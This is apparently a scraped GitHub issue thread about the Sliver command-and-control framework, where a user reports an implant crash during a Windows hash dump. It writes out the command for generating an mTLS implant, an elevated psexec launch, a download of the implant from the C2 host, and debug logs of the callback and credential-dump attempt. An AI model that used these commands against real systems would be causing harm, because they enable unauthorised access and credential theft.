Comments (4)
rkervella
commented on July 19, 2024
1
Looks like an easy fix.
from sliver.
rkervella
commented on July 19, 2024
1
Closing since it's not a bug in Sliver. Follow up here.
from sliver.
rkervella
commented on July 19, 2024
Does this also happen in debug mode? If so, can you share the output of implant?
from sliver.
n3rada
commented on July 19, 2024
Session implant generated with:
generate --mtls 192.168.45.199:443 -Z r -e -f exe -o windows -a amd64 -s /tmp/test.exe -dConnecting through RDP to the machine in order to see the debug output. Launching an elevated terminal with:
.\psexec.exe -accepteula -S -I -D powershell.exeThen, downloading the test.exe file:
irm 192.168.45.199/test.exe -o test.exeExecuting-it, doing the hashdump thing and here are detailed output:
PS C:\Windows\system32> .\test.exe
2024/05/01 02:20:52 sliver.go:97: Hello my name is ANXIOUS_PRIZE
2024/05/01 02:20:52 limits.go:58: Limit checks completed
2024/05/01 02:20:52 sliver.go:115: Running in session mode
2024/05/01 02:20:52 session.go:69: Starting interactive session connection loop ...
2024/05/01 02:20:52 transports.go:41: Starting c2 url generator (r) ...
2024/05/01 02:20:52 transports.go:104: Return generator: (chan *url.URL)(0xc0000607e0)
2024/05/01 02:20:52 transports.go:92: Yield c2 uri = 'mtls://192.168.45.199:443'
2024/05/01 02:20:52 transports.go:92: Yield c2 uri = 'mtls://192.168.45.199:443'
2024/05/01 02:20:52 session.go:86: Next CC = mtls://192.168.45.199:443
2024/05/01 02:20:52 session.go:86: Next CC = mtls://192.168.45.199:443
2024/05/01 02:20:52 transports.go:92: Yield c2 uri = 'mtls://192.168.45.199:443'
2024/05/01 02:20:52 session.go:176: Connecting -> 192.168.45.199:443
2024/05/01 02:20:52 sliver.go:296: Host Uuid: e19c1e42-ee8e-69c1-b6eb-402f7bee1d5d
2024/05/01 02:20:52 tun-handlers.go:45: [tunnel] Tunnel handlers map[20:0x7d0380 22:0x7cdda0 23:0x7ccf80 80:0x7ce940 82:0x7d1f80]
2024/05/01 02:21:25 sliver.go:206: [recv] sysHandler 100
2024/05/01 02:21:49 sliver.go:206: [recv] sysHandler 92
2024/05/01 02:21:49 sliver.go:206: [recv] sysHandler 90
2024/05/01 02:21:49 sliver.go:206: [recv] sysHandler 91
2024/05/01 02:21:49 extension_windows.go:113: Calling Hashdump, arguments addr: 0x00000000, args size: 00000000
panic: runtime error: index out of range [0] with length 0
goroutine 17 [running, locked to thread]:
github.com/lesnuages/gosecretsdump/pkg/samreader.SamReader.Dump({0x0, {0x1c00000a1b0, 0x10, 0x10}, 0x1, {0x0, 0x0}, {0x0, 0x0}, {0x0, ...}, ...})
/home/runner/go/pkg/mod/github.com/lesnuages/[email protected]/pkg/samreader/samreader.go:314 +0x5b0
github.com/sliverarmory/secretsdump/pkg/hashdump.Hashdump()
/home/runner/work/hashdump/hashdump/pkg/hashdump/hashdump.go:27 +0x1d8
main.Hashdump(0x1c000052000?, 0x0?, 0x393bb0001?)
/home/runner/work/hashdump/hashdump/dll/main.go:28 +0x18I do not know why it failed to dump the hashes here, but maybe could you at least add a try catch for index out of range to avoid the implant to go away?
from sliver.
Related Issues (20)
- Stager shellcode generation fails on Kali VM on Apple Silicon (ARM) Mac HOT 2
- changing host header does not work HOT 8
- Armory update/install is not working as expected
- Unable to run DNS C2 on latest version HOT 3
- How can I remove rportfwd? HOT 2
- COFFLoader x86 release 1.0.14 uses libgcc_s_dw2-1.dll
- Ported Remote Ops Bof: Injection HOT 1
- compile it with make and run . /sliver-server,it says: zsh: exec format error: . /sliver-server. HOT 3
- go-assets.sh: /bin/bash^M: bad interpreter: No such file or directory HOT 1
- panic: runtime error: index out of range [1] with length 1 HOT 4
- Wg connectivity issues HOT 1
- How to generate stager on linux? HOT 4
- NetHunter Kali Termux : Sliver Client Frozen Upon Running
- PS command causes implant on Darwin to spin the CPU at 100% indefinitely
- Using screenshot under http implant HOT 2
- Which version can create dns c2 HOT 1
- make master sliver not 1.6 version HOT 1
- The cmd window is not hidden when executing the command
- sliver-client's config directory hard-coded to `~/.sliver-client/`
- DNS C2 - no communication
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from sliver.